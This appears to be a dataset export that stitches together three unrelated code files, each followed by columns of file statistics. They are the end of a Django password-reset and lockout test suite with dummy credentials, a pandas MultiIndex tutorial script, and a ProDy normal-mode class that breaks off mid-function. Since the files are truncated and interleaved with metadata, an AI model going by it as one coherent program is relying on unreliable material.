res = self.client.get(url)
self.assertEqual(res.status_code, 302)
def test_username_as_identifier(self):
response = self.client.post(
reverse("reset_password"),
data={
"email": "user_no_email"
}
)
self.assertRedirects(
response, reverse("reset_password_security_questions"))
@patch("authentication_service.tasks.send_mail.apply_async")
def test_email_as_identifier(self, send_mail):
response = self.client.post(
reverse("reset_password"),
data={
"email": "user@id.com"
}
)
send_mail.assert_called()
self.assertNotIn("User not found", response)
self.assertEquals(response.status_code, 302)
self.assertEquals(response.url, reverse("password_reset_done"))
def test_user_not_found(self):
response = self.client.post(
reverse("reset_password"),
data={
"email": "identifiable_user2"
}
)
self.assertRedirects(response, reverse("password_reset_done"))
response = self.client.post(
reverse("reset_password"),
data={
"email": "user2@id.com"
}
)
self.assertRedirects(response, reverse("password_reset_done"))
def test_security_question_reset(self):
# Explicity set a session variable to access
session = self.client.session
session["lookup_user_id"] = str(self.user_no_email.id)
session.save()
response = self.client.get(
reverse("reset_password_security_questions")
)
self.assertContains(response, "question_%s" % self.user_answer_one.id)
self.assertContains(response, "question_%s" % self.user_answer_two.id)
response = self.client.post(
reverse("reset_password_security_questions"),
data={
"question_%s" % self.user_answer_one.id: "one",
"question_%s" % self.user_answer_two.id: "three"
}
)
self.assertContains(response, "One or more answers are incorrect")
response = self.client.post(
reverse("reset_password_security_questions"),
data={
"question_%s" % self.user_answer_one.id: "one",
"question_%s" % self.user_answer_two.id: "two"
}
)
# Redirects to password reset confirm view
self.assertEquals(response.status_code, 302)
class DeleteAccountTestCase(TestCase):
@classmethod
def setUpTestData(cls):
cls.user = get_user_model().objects.create(
username="leaving_user", email="awol@id.com",
birth_date=datetime.date(2001, 1, 1)
)
cls.user.set_password("atleast_its_not_1234")
cls.user.save()
def test_view_html_toggle(self):
self.client.login(username=self.user.username, password="atleast_its_not_1234")
response = self.client.get(reverse("delete_account"))
self.assertNotContains(response, "confirmed_deletion")
response = self.client.post(
reverse("delete_account"),
data={
"reason": "The theme is ugly"
}
)
self.assertContains(
response,
'<input name="confirmed_deletion" type="submit" value="Delete account" class="Button" />'
)
self.assertContains(response,
"<textarea name=\"reason\" cols=\"40\" rows=\"10\" id=\"id_reason\" class=\" Textarea \">"
)
@patch("authentication_service.tasks.send_mail.apply_async")
def test_mail_task_fires(self, send_mail):
self.test_view_html_toggle()
response = self.client.post(
reverse("delete_account"),
data={
"reason": "The theme is ugly",
"confirmed_deletion": "Are you sure?"
}
)
send_mail.assert_called_with(
kwargs={
"context": {"reason": "The theme is ugly"},
"mail_type": "delete_account",
"objects_to_fetch": [{
"app_label": "authentication_service",
"model": "coreuser",
"id": self.user.id,
"context_key": "user"}]
}
)
class TestMigrationPasswordReset(TestCase):
def goto_login(self):
# Setup session values
return self.client.get(
f"{reverse('oidc_provider:authorize')}?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http%3A%2F%2Fexample.com%2F&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
follow=True
)
@classmethod
def setUpTestData(cls):
super(TestMigrationPasswordReset, cls).setUpTestData()
cls.temp_user = TemporaryMigrationUserStore.objects.create(
username="forgetfulmigrateduser",
client_id="migration_client_id",
user_id=4,
answer_one="a",
answer_two="b",
question_one={'en': 'Some awesome question'},
question_two={'en': 'Another secure question'}
)
cls.temp_user.set_password("Qwer!234")
cls.temp_user.set_answers("Answer1", "Answer2")
Client.objects.create(
client_id="migration_client_id",
name= "MigrationCLient",
client_secret= "super_client_secret_1",
response_type= "code",
jwt_alg= "HS256",
redirect_uris= ["http://example.com/"]
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_no_answers(self):
temp_user = TemporaryMigrationUserStore.objects.create(
username="reallyforgetfulmigrateduser",
client_id="migration_client_id",
user_id=6,
question_one={},
question_two={}
)
# Setup session values
self.client.get(
f"{reverse('oidc_provider:authorize')}?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http%3A%2F%2Fexample.com%2F&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
follow=True
)
response = self.client.post(
reverse("reset_password"),
data={
"email": "reallyforgetfulmigrateduser"
},
follow=True
)
messages = list(get_messages(response.wsgi_request))
self.assertEqual(len(messages), 1)
self.assertEqual(
messages[0].message,
"We are sorry, your account can not perform this action"
)
self.assertEqual(
messages[0].level_tag,
"warning"
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_securityquestion_step_404(self):
temp_user = TemporaryMigrationUserStore.objects.create(
username="404migrateduser",
client_id="migration_client_id",
question_one={"en": "Some awesome question"},
question_two={"en": "Another secure question"},
user_id=7
)
temp_user.set_password("Qwer!234")
temp_user.set_answers("Answer1", "Answer2")
self.client.get(
f"{reverse('oidc_provider:authorize')}?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http%3A%2F%2Fexample.com%2F&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
follow=True
)
response = self.client.post(
reverse("reset_password"),
data={
"email": "404migrateduser"
},
follow=True
)
url = response.redirect_chain[-1][0]
TemporaryMigrationUserStore.objects.filter(
username="404migrateduser",
client_id="migration_client_id",
user_id=7
).delete()
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
@override_settings(ACCESS_CONTROL_API=MagicMock())
@patch("django.core.signing.loads")
def test_securityquestion_step_expired_token(self, expire_mock):
temp_user = TemporaryMigrationUserStore.objects.create(
username="404migrateduser",
client_id="migration_client_id",
question_one={"en": "Some awesome question"},
question_two={"en": "Another secure question"},
user_id=50
)
temp_user.set_password("Qwer!234")
temp_user.set_answers("Answer1", "Answer2")
self.client.get(
f"{reverse('oidc_provider:authorize')}?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http%3A%2F%2Fexample.com%2F&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
follow=True
)
expire_mock.side_effect = signing.SignatureExpired("Expired")
response = self.client.post(
reverse("reset_password"),
data={
"email": "404migrateduser"
},
follow=True
)
self.assertRedirects(
response,
"/en/login/"
)
messages = list(get_messages(response.wsgi_request))
self.assertEqual(len(messages), 1)
self.assertEqual(
messages[0].message,
"Password reset url has expired, please restart the password reset proces."
)
self.assertEqual(
messages[0].level_tag,
"error"
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_one_answer(self):
temp_user = TemporaryMigrationUserStore.objects.create(
username="slightlyforgetfulmigrateduser",
client_id="migration_client_id",
user_id=6,
question_one={'en': 'Some awesome question'},
question_two={}
)
temp_user.set_answers("Answer1")
# Setup session values
self.client.get(
f"{reverse('oidc_provider:authorize')}?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http%3A%2F%2Fexample.com%2F&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
follow=True
)
response = self.client.post(
reverse("reset_password"),
data={
"email": "slightlyforgetfulmigrateduser"
},
follow=True
)
token_url = response.redirect_chain[-1][0]
self.assertIn(
"/en/user-migration/question-gate/",
token_url
)
self.assertContains(
response,
'<input type="hidden" name="answer_two" disabled id="id_answer_two" class=" HiddenInput " />'
)
self.assertContains(
response,
f'<input type="hidden" value="{temp_user.username}" name="auth-username">'
)
response = self.client.post(
token_url,
data={
"answer_one": "slightlyforgetfulmigrateduser"
},
follow=True
)
self.assertEqual(
response.context["form"].non_field_errors(),
["Incorrect answer provided"]
)
response = self.client.post(
token_url,
data={
"answer_one": "Answer1"
},
follow=True
)
token_url = response.redirect_chain[-1][0]
self.assertIn(
"/en/user-migration/password-reset/",
token_url
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_question_gate_view(self):
response = self.goto_login()
self.assertRedirects(
response,
"/en/login/?next=/openid/authorize%3Fresponse_type%3Dcode%26scope%3Dopenid%26client_id%3Dmigration_client_id%26redirect_uri%3Dhttp%253A%252F%252Fexample.com%252F%26state%3D3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO"
)
response = self.client.post(
reverse("reset_password"),
data={
"email": "forgetfulmigrateduser"
},
follow=True
)
token_url = response.redirect_chain[-1][0]
self.assertIn(
"/en/user-migration/question-gate/",
token_url
)
self.assertContains(
response,
"Some awesome question"
)
self.assertContains(
response,
"Another secure question"
)
response = self.client.post(
token_url,
data={
"answer_one": "forgetfulmigrateduser",
"answer_two": "forgetfulmigrateduser"
},
)
self.assertEqual(
response.context["form"].non_field_errors(),
["Incorrect answers provided"]
)
response = self.client.post(
token_url,
data={
"answer_one": "Answer1",
"answer_two": "Answer2"
},
follow=True
)
token_url = response.redirect_chain[-1][0]
self.assertIn(
"/en/user-migration/password-reset/",
token_url
)
return token_url
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_question_gate_language_404(self):
response = self.goto_login()
self.assertRedirects(
response,
"/en/login/?next=/openid/authorize%3Fresponse_type%3Dcode%26scope%3Dopenid%26client_id%3Dmigration_client_id%26redirect_uri%3Dhttp%253A%252F%252Fexample.com%252F%26state%3D3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO"
)
# Change language
response = self.client.get(
f"/prs{reverse('reset_password')}",
follow=True
)
response = self.client.post(
reverse("reset_password"),
data={
"email": "forgetfulmigrateduser"
},
follow=True
)
self.assertEquals(response.status_code, 404)
self.assertIn(b"<p>No question translation matching the current language could be found.</p>", response.content)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_password_reset_view(self):
url = self.test_question_gate_view()
response = self.client.post(
url,
data={
"password_one": "aaaaaa",
"password_two": "bbbbbb"
}
)
self.assertEqual(
response.context["form"].errors,
{"password_two": ["Passwords do not match."]}
)
response = self.client.post(
url,
data={
"password_one": "aa",
"password_two": "aa"
}
)
self.assertEqual(
response.context["form"].errors,
{"password_two": ["Password not long enough."]}
)
response = self.client.post(
url,
data={
"password_one": "CoolNew",
"password_two": "CoolNew"
},
follow=True
)
self.assertRedirects(
response,
"/en/reset-password/done/"
)
user = TemporaryMigrationUserStore.objects.get(
username=self.temp_user.username,
client_id=self.temp_user.client_id,
user_id=self.temp_user.user_id,
)
self.assertTrue(user.check_password("CoolNew"))
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_ensure_client_id_always_present(self):
temp_user = TemporaryMigrationUserStore.objects.create(
username="Ididnotrealyforgetanything",
client_id="migration_client_id",
user_id=7,
question_one={'en': 'Some awesome question'},
question_two={}
)
temp_user.set_answers("Answer1")
# Setup session values
self.client.get(
f"{reverse('oidc_provider:authorize')}?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http%3A%2F%2Fexample.com%2F&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
follow=True
)
# Trigger session values clear and setup again
self.client.get(
f"{reverse('oidc_provider:authorize')}?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http%3A%2F%2Fexample.com%2F&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
follow=True
)
response = self.client.post(
reverse("reset_password"),
data={
"email": "Ididnotrealyforgetanything"
},
follow=True
)
token_url = response.redirect_chain[-1][0]
self.assertIn(
"/en/user-migration/question-gate/",
token_url
)
class TestMigrationPasswordResetLockout(TestCase):
def goto_login(self):
# Setup session values
return self.client.get(
f"{reverse('oidc_provider:authorize')}?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http%3A%2F%2Fexample.com%2F&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
follow=True
)
@classmethod
def setUpTestData(cls):
super(TestMigrationPasswordResetLockout, cls).setUpTestData()
cls.temp_user = TemporaryMigrationUserStore.objects.create(
username="forgetfulmigrateduser",
client_id="migration_client_id",
user_id=4,
answer_one="a",
answer_two="b",
question_one={'en': 'Some awesome question'},
question_two={'en': 'Another secure question'}
)
cls.temp_user.set_password("Qwer!234")
cls.temp_user.set_answers("Answer1", "Answer2")
Client.objects.create(
client_id="migration_client_id",
name= "MigrationCLient",
client_secret= "super_client_secret_1",
response_type= "code",
jwt_alg= "HS256",
redirect_uris= ["http://example.com/"]
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_lockout(self):
response = self.goto_login()
self.assertRedirects(
response,
"/en/login/?next=/openid/authorize%3Fresponse_type%3Dcode%26scope%3Dopenid%26client_id%3Dmigration_client_id%26redirect_uri%3Dhttp%253A%252F%252Fexample.com%252F%26state%3D3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO"
)
response = self.client.post(
reverse("reset_password"),
data={
"email": "forgetfulmigrateduser"
},
follow=True
)
token_url = response.redirect_chain[-1][0]
self.assertIn(
"/en/user-migration/question-gate/",
token_url
)
self.assertContains(
response,
"Some awesome question"
)
self.assertContains(
response,
"Another secure question"
)
unblock_username(self.temp_user.username)
allowed_attempts = settings.DEFENDER_LOGIN_FAILURE_LIMIT
attempt = 0
while attempt < allowed_attempts:
attempt += 1
response = self.client.post(
token_url,
data={
"auth-username": self.temp_user.username,
"answer_one": "forgetfulmigrateduser",
"answer_two": "forgetfulmigrateduser"
},
)
self.assertEqual(
response.context["form"].non_field_errors(),
["Incorrect answers provided"]
)
self.assertEqual(response.status_code, 200)
self.assertIn("authentication_service/form.html",
response.template_name)
# The next (failed) attempt needs to prevent further attempts
with self.assertTemplateUsed("authentication_service/lockout.html"):
response = self.client.post(
token_url,
data={
"auth-username": self.temp_user.username,
"answer_one": "forgetfulmigrateduser",
"answer_two": "forgetfulmigrateduser"
},
follow=True
)
with self.assertTemplateUsed("authentication_service/lockout.html"):
response = self.client.post(
token_url,
data={
"auth-username": self.temp_user.username,
"answer_one": "Answer1",
"answer_two": "Answer2"
},
follow=True
)
# Manually unblock the username. This allows the user to try again.
unblock_username(self.temp_user.username)
class HealthCheckTestCase(TestCase):
def test_healthcheck(self):
response = self.client.get(reverse("healthcheck"))
self.assertContains(response, "host")
self.assertContains(response, "server_timestamp")
self.assertContains(response, "db_timestamp")
self.assertContains(response, "version")
class TestResetPasswordSecurityQuestionsView(TestCase):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.user = get_user_model().objects.create_user(
username="user_who_forgets_creds",
password="Qwer!234",
birth_date=datetime.date(2001, 1, 1)
)
cls.user.save()
cls.question_one = SecurityQuestion.objects.create(
question_text="Some text for the one question"
)
cls.question_two = SecurityQuestion.objects.create(
question_text="Some text for the other question"
)
cls.user_answer_one = UserSecurityQuestion.objects.create(
question=cls.question_one,
user=cls.user,
answer=make_password("right")
)
cls.user_answer_two = UserSecurityQuestion.objects.create(
question=cls.question_two,
user=cls.user,
answer=make_password("right")
)
def test_with_no_answer(self):
# Sets up the lookup user id
response = self.client.post(
reverse("reset_password"), {"email": self.user.username}, follow=True)
response = self.client.post(
response.redirect_chain[-1][0],
{}
)
self.assertEqual(
response.context["form"].errors,
{
f"question_{self.user_answer_one.id}": [
"This field is required."],
f"question_{self.user_answer_two.id}": [
"This field is required."],
"__all__": ["Please answer all your security questions."],
}
)
| 38.430139
| 220
| 0.578684
| 8,740
| 91,041
| 5.842792
| 0.070252
| 0.029374
| 0.036306
| 0.030157
| 0.841597
| 0.813457
| 0.790311
| 0.755395
| 0.7289
| 0.70593
| 0
| 0.022747
| 0.31432
| 91,041
| 2,368
| 221
| 38.446368
| 0.79529
| 0.027987
| 0
| 0.624822
| 0
| 0.007133
| 0.291819
| 0.139059
| 0
| 0
| 0
| 0.000422
| 0.084165
| 1
| 0.035663
| false
| 0.062292
| 0.010937
| 0.001427
| 0.055159
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
e8e51b34756756ecd8d13554c4a3db42d9354da3
| 9,706
|
py
|
Python
|
notebook/pandas_multiindex_indexing.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 174
|
2018-05-30T21:14:50.000Z
|
2022-03-25T07:59:37.000Z
|
notebook/pandas_multiindex_indexing.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 5
|
2019-08-10T03:22:02.000Z
|
2021-07-12T20:31:17.000Z
|
notebook/pandas_multiindex_indexing.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 53
|
2018-04-27T05:26:35.000Z
|
2022-03-25T07:59:37.000Z
|
import pandas as pd
df = pd.read_csv('data/src/sample_multi.csv', index_col=[0, 1, 2])
print(df)
# val_1 val_2
# level_1 level_2 level_3
# A0 B0 C0 98 90
# C1 44 9
# B1 C2 39 17
# C3 75 71
# A1 B2 C0 1 89
# C1 54 60
# B3 C2 47 6
# C3 16 5
# A2 B0 C0 75 22
# C1 19 4
# B1 C2 25 52
# C3 57 40
# A3 B2 C0 64 54
# C1 27 96
# B3 C2 100 77
# C3 22 50
print(df.index)
# MultiIndex(levels=[['A0', 'A1', 'A2', 'A3'], ['B0', 'B1', 'B2', 'B3'], ['C0', 'C1', 'C2', 'C3']],
# labels=[[0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3], [0, 0, 1, 1, 2, 2, 3, 3, 0, 0, 1, 1, 2, 2, 3, 3], [0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3]],
# names=['level_1', 'level_2', 'level_3'])
print(df.loc['A0', 'val_1'])
# level_2 level_3
# B0 C0 98
# C1 44
# B1 C2 39
# C3 75
# Name: val_1, dtype: int64
print(df.loc['A0', :])
# val_1 val_2
# level_2 level_3
# B0 C0 98 90
# C1 44 9
# B1 C2 39 17
# C3 75 71
print(df.loc['A0'])
# val_1 val_2
# level_2 level_3
# B0 C0 98 90
# C1 44 9
# B1 C2 39 17
# C3 75 71
print(df.loc['A0':'A2', :])
# val_1 val_2
# level_1 level_2 level_3
# A0 B0 C0 98 90
# C1 44 9
# B1 C2 39 17
# C3 75 71
# A1 B2 C0 1 89
# C1 54 60
# B3 C2 47 6
# C3 16 5
# A2 B0 C0 75 22
# C1 19 4
# B1 C2 25 52
# C3 57 40
print(df.loc[['A0', 'A2'], :])
# val_1 val_2
# level_1 level_2 level_3
# A0 B0 C0 98 90
# C1 44 9
# B1 C2 39 17
# C3 75 71
# A2 B0 C0 75 22
# C1 19 4
# B1 C2 25 52
# C3 57 40
print(df.loc[('A0', 'B1'), :])
# val_1 val_2
# level_3
# C2 39 17
# C3 75 71
print(df.loc[('A0', 'B1', 'C2'), :])
# val_1 39
# val_2 17
# Name: (A0, B1, C2), dtype: int64
print(df.loc[(['A0', 'A1'], ['B0', 'B3']), :])
# val_1 val_2
# level_1 level_2 level_3
# A0 B0 C0 98 90
# C1 44 9
# A1 B3 C2 47 6
# C3 16 5
# print(df.loc[(:, 'B1'), :])
# SyntaxError: invalid syntax
# print(df.loc[('A1':'A3', 'B2'), :])
# SyntaxError: invalid syntax
print(df.loc[(slice(None), 'B1'), :])
# val_1 val_2
# level_1 level_2 level_3
# A0 B1 C2 39 17
# C3 75 71
# A2 B1 C2 25 52
# C3 57 40
print(df.loc[(slice('A1', 'A3'), 'B2'), :])
# val_1 val_2
# level_1 level_2 level_3
# A1 B2 C0 1 89
# C1 54 60
# A3 B2 C0 64 54
# C1 27 96
print(df.loc[(slice('A1', 'A3'), ['B0', 'B2'], 'C1'), :])
# val_1 val_2
# level_1 level_2 level_3
# A1 B2 C1 54 60
# A2 B0 C1 19 4
# A3 B2 C1 27 96
print(df.loc[pd.IndexSlice[:, 'B1'], :])
# val_1 val_2
# level_1 level_2 level_3
# A0 B1 C2 39 17
# C3 75 71
# A2 B1 C2 25 52
# C3 57 40
print(df.loc[pd.IndexSlice['A1':'A3', 'B2'], :])
# val_1 val_2
# level_1 level_2 level_3
# A1 B2 C0 1 89
# C1 54 60
# A3 B2 C0 64 54
# C1 27 96
print(df.loc[pd.IndexSlice['A1':'A3', ['B0', 'B2'], 'C1'], :])
# val_1 val_2
# level_1 level_2 level_3
# A1 B2 C1 54 60
# A2 B0 C1 19 4
# A3 B2 C1 27 96
print(df.xs('B1', level='level_2'))
# val_1 val_2
# level_1 level_3
# A0 C2 39 17
# C3 75 71
# A2 C2 25 52
# C3 57 40
print(df.xs('C1', level=2))
# val_1 val_2
# level_1 level_2
# A0 B0 44 9
# A1 B2 54 60
# A2 B0 19 4
# A3 B2 27 96
print(df.xs(['B1', 'C2'], level=['level_2', 'level_3']))
# val_1 val_2
# level_1
# A0 39 17
# A2 25 52
print(df.xs(pd.IndexSlice['A1':'A3'], level='level_1'))
# val_1 val_2
# level_2 level_3
# B2 C0 1 89
# C1 54 60
# B3 C2 47 6
# C3 16 5
# B0 C0 75 22
# C1 19 4
# B1 C2 25 52
# C3 57 40
# B2 C0 64 54
# C1 27 96
# B3 C2 100 77
# C3 22 50
print(df.xs(slice('A1', 'A3'), level='level_1'))
# val_1 val_2
# level_2 level_3
# B2 C0 1 89
# C1 54 60
# B3 C2 47 6
# C3 16 5
# B0 C0 75 22
# C1 19 4
# B1 C2 25 52
# C3 57 40
# B2 C0 64 54
# C1 27 96
# B3 C2 100 77
# C3 22 50
# print(df.xs(['B1', 'B2'], level='level_2'))
# KeyError: ('B1', 'B2')
print(df.loc[pd.IndexSlice[:, ['B1', 'B2']], :])
# val_1 val_2
# level_1 level_2 level_3
# A0 B1 C2 39 17
# C3 75 71
# A1 B2 C0 1 89
# C1 54 60
# A2 B1 C2 25 52
# C3 57 40
# A3 B2 C0 64 54
# C1 27 96
df.loc[(['A0', 'A1'], ['B0', 'B3']), :] = -100
print(df)
# val_1 val_2
# level_1 level_2 level_3
# A0 B0 C0 -100 -100
# C1 -100 -100
# B1 C2 39 17
# C3 75 71
# A1 B2 C0 1 89
# C1 54 60
# B3 C2 -100 -100
# C3 -100 -100
# A2 B0 C0 75 22
# C1 19 4
# B1 C2 25 52
# C3 57 40
# A3 B2 C0 64 54
# C1 27 96
# B3 C2 100 77
# C3 22 50
df.loc[(['A0', 'A1'], ['B0', 'B3']), :] = [-200, -300]
print(df)
# val_1 val_2
# level_1 level_2 level_3
# A0 B0 C0 -200 -300
# C1 -200 -300
# B1 C2 39 17
# C3 75 71
# A1 B2 C0 1 89
# C1 54 60
# B3 C2 -200 -300
# C3 -200 -300
# A2 B0 C0 75 22
# C1 19 4
# B1 C2 25 52
# C3 57 40
# A3 B2 C0 64 54
# C1 27 96
# B3 C2 100 77
# C3 22 50
df.loc[(['A0', 'A1'], ['B0', 'B3']), :] = [[-1, -2], [-3, -4], [-5, -6], [-7, -8]]
print(df)
# val_1 val_2
# level_1 level_2 level_3
# A0 B0 C0 -1 -2
# C1 -3 -4
# B1 C2 39 17
# C3 75 71
# A1 B2 C0 1 89
# C1 54 60
# B3 C2 -5 -6
# C3 -7 -8
# A2 B0 C0 75 22
# C1 19 4
# B1 C2 25 52
# C3 57 40
# A3 B2 C0 64 54
# C1 27 96
# B3 C2 100 77
# C3 22 50
# df.xs(['B1', 'C2'], level=['level_2', 'level_3']) = 0
# SyntaxError: can't assign to function call
| 33.584775
| 171
| 0.286833
| 1,151
| 9,706
| 2.314509
| 0.074718
| 0.099099
| 0.060435
| 0.066066
| 0.838964
| 0.838213
| 0.752252
| 0.731231
| 0.712838
| 0.676051
| 0
| 0.32627
| 0.62075
| 9,706
| 288
| 172
| 33.701389
| 0.397446
| 0.829796
| 0
| 0.133333
| 0
| 0
| 0.126429
| 0.017857
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.033333
| 0
| 0.033333
| 0.833333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
e8f41406cd05cfd60f730812638a362bc9a38230
| 131,770
|
py
|
Python
|
Software/ANMs.py
|
hrch3n/cNMA
|
32bfffc707487fa0964543d17b1fe89f089e09d5
|
[
"MIT"
] | 3
|
2021-02-09T02:32:33.000Z
|
2021-09-14T22:18:26.000Z
|
Software/ANMs.py
|
hrch3n/cNMA
|
32bfffc707487fa0964543d17b1fe89f089e09d5
|
[
"MIT"
] | 1
|
2018-03-09T19:28:42.000Z
|
2018-03-30T20:08:50.000Z
|
Software/ANMs.py
|
hrch3n/cNMA
|
32bfffc707487fa0964543d17b1fe89f089e09d5
|
[
"MIT"
] | 6
|
2018-12-05T14:49:26.000Z
|
2019-11-07T03:44:18.000Z
|
'''
Created on Jan 17, 2014
@author: oliwa
'''
import sys as sys
import numpy as np
from prody.dynamics.anm import calcANM, ANM
from prody.dynamics.editing import extendModel, sliceModel
from prody.dynamics.functions import saveModel, loadModel, writeArray
from prody.proteins.pdbfile import writePDB, parsePDB
from prody.dynamics.mode import Vector
from prody.measure.measure import calcCenter, calcDistance
from prody.dynamics.compare import calcOverlap, calcCumulOverlap,\
calcSubspaceOverlap, calcCovOverlap, printOverlapTable, getOverlapTable
from prody.apps.prody_apps.prody_contacts import prody_contacts
import traceback
from prody.dynamics.nmdfile import writeNMD
import scipy as sp
class ANMs(object):
"""
This class holds all the ANMs for an encounter.
"""
def __init__(self, utils):
"""
Constructor
"""
self.utils = utils
def createSlcSelectionString(self, reference, isBoundComplex, ref_chain, referenceTitle):
""" Under the assumption that is reflected in the Benchmark 4.0 that the receptor atoms are set before the
ligand atoms (spacially in the PDB file), if the current protein under investigation is a ligand,
an offset is added to the selection string to match the atoms of the ligand from the complex. """
if isBoundComplex and not self.utils.isReceptor(referenceTitle):
print "adding offset"
return self.utils.addOffset(ref_chain.getSelstr(), reference.select('segment "R."').numAtoms())
else:
print "using original selstr"
return ref_chain.getSelstr()
def calcANMs(self, reference, ref_chain, numberOfModes, encounter, selstr='calpha', whatAtomsToMatch='calpha', modified="", forceRebuild=False, isBoundComplex=False):
# if the base model does not exist, it needs to be created along with the
# extended and slicedback models
if forceRebuild or not self.doesANMExist(reference, numberOfModes, selstr, whatAtomsToMatch, modified):
# Create the anm
anm = calcANM(reference, n_modes=numberOfModes, selstr=selstr)
# First extend the anm on all atoms
anm_extend = extendModel(anm[0], anm[1], reference, norm=True)
# Then slice it back to matched
selectionAtoms = self.createSlcSelectionString(reference, isBoundComplex, ref_chain, encounter.getReference().getTitle())
anm_slc = sliceModel(anm_extend[0], anm_extend[1], selectionAtoms)
# If isBoundComplex, slice one anm back to its overall matched chains
if isBoundComplex:
selectionAtomsCounterpart = self.createSlcSelectionString(reference, isBoundComplex, encounter.getBoundCounterpartChain(), encounter.getUnboundCounterpart().getTitle())
anm_slc_counterpart= sliceModel(anm_extend[0], anm_extend[1], selectionAtomsCounterpart)
# Save the models
# saveModel(anm[0],
# filename=self.getANMPath(reference, numberOfModes, selstr, whatAtomsToMatch),
# matrices=True)
# saveModel(anm_extend[0],
# filename=self.getANMPath(reference, numberOfModes, selstr, whatAtomsToMatch, modified="extended"),
# matrices=True
# )
# saveModel(anm_slc[0],
# filename=self.getANMPath(reference, numberOfModes, selstr, whatAtomsToMatch, modified="slicedback"),
# matrices=True
# )
print "created and saved models"
# print "reference, it is the complex: ", reference.select('calpha and segment "R."').numAtoms()
# print "to slice on, it is the mob_chain: ", ref_chain.numAtoms()
print "anm hessian : " + str(anm[0].getHessian().shape)
print "number of calpha : " + str(reference.select('calpha').numAtoms())
print "anm size : " + str(anm[0].getArray().shape)
print "anm_ext size : " + str(anm_extend[0].getArray().shape)
print "anm_slice size : " + str(anm_slc[0].getArray().shape)
print "selectionAtoms : " + selectionAtoms
if isBoundComplex:
print "anm slice counterpart size: " + str(anm_slc_counterpart[0].getArray().shape)
print "selectionAtoms counterpart: " + selectionAtomsCounterpart
# Save the models"
self._anm = anm
self._anm_extend = anm_extend
self._anm_slc = anm_slc
if isBoundComplex:
self._anm_slc_counterpart = anm_slc_counterpart
else:
#raise Exception("Problem with capturing the selection of saved models, do not use load models from files now.")
try:
# load models
anmModel = loadModel(self.getANMPath(reference, numberOfModes, selstr, whatAtomsToMatch)+".anm.npz")
anm_extendModel = loadModel(self.getANMPath(reference, numberOfModes, selstr, whatAtomsToMatch, modified="extended")+".nma.npz")
anm_slcModel = loadModel(self.getANMPath(reference, numberOfModes, selstr, whatAtomsToMatch, modified="slicedback")+".nma.npz")
# store models selections
anmModelSelection = reference.select(selstr)
anm_extendModelSelection = reference
selectionAtoms = self.createSlcSelectionString(reference, isBoundComplex, ref_chain)
anm_slcModelSelection = reference.select(selectionAtoms)
# recombine models and selections as tuples
anm = (anmModel, anmModelSelection)
anm_extend = (anm_extendModel, anm_extendModelSelection)
anm_slc = (anm_slcModel, anm_slcModelSelection)
print "loaded models"
print "anm size : " + str(anm[0].getArray().shape)
print "anm_ext size : " + str(anm_extend[0].getArray().shape)
print "anm_slice size: " + str(anm_slc[0].getArray().shape)
print "selectionAtoms: " + selectionAtoms
self._anm = anm
self._anm_extend = anm_extend
self._anm_slc = anm_slc
except IOError as e:
print "Error loading ANM models from disc: "+str(e)
def calcANMsForPart2a2k(self, reference, counterpart, proteinComplex, ref_chain, counterpart_chain, chain_complex, numberOfModes, selstr='calpha', whatAtomsToMatch='calpha'):
# Create the anm of reference, counterpart and proteinComplex)
